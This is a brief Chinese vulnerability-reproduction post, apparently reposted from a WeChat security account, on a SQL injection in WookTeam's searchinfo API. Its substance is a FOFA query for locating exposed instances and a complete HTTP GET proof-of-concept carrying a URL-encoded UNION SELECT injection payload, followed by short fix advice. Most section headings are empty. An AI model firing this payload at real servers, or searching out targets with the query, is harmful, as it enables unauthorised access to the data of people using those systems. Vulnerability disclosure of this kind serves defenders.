产品介绍
漏洞威胁
漏洞环境
FOFA:
title="Wookteam"
漏洞复现
PoC
GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2CMD5%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
查询
批量脚本验证
Nuclei验证脚本已发布
修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
原文始发于微信公众号(冷漠安全):「漏洞复现」WookTeam searchinfo SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论